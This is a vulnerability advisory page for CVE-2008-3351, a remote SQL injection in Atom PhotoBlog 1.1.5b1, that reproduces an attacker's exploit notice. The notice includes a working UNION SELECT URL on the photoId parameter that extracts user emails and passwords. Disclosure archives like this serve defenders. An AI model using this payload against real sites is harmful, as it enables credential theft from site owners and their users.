Topic : | Atom PhotoBlog 1.1.5b1 (photoId) Remote SQL Injection Vulnerability
|
SecurityAlert : 4053
CVE : CVE-2008-3351
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit :
Published : 31.07.2008
Affected Software : | Atomphotoblog, Atomphotoblog, 1.0.9.1
Atomphotoblog, Atomphotoblog, 1.1.5, B1 |
 Advisory Content : ###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## Atom PhotoBlog ( atomPhotoBlog.php do )
##
## http://sourceforge.net/projects/atomphotoblog/
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM/f
##
## Email : SQL@Hotmail.it
##
## SYRIAN Arab HACkErS
########################
########################
##
## -[[: Exploite :]]-
##
##
www.Target.com/atomPhotoBlog.php?do=show&photoId=969696+union+select+0,0,0,
0,0,0,0,0,0,0,0,mail,pass,0+from+user
##
########################
########################
###########################################################################
############################
###########################################################################
############################
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD ::
milw0rm :: MuslimS HaCkErS ::
###########################################################################
############################
###########################################################################
############################
References :
http://securityreason.com/expldownload/1/4387/1 (Exploit)
http://xforce.iss.net/xforce/xfdb/43982
http://www.milw0rm.com/exploits/6125
http://secunia.com/advisories/31205
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|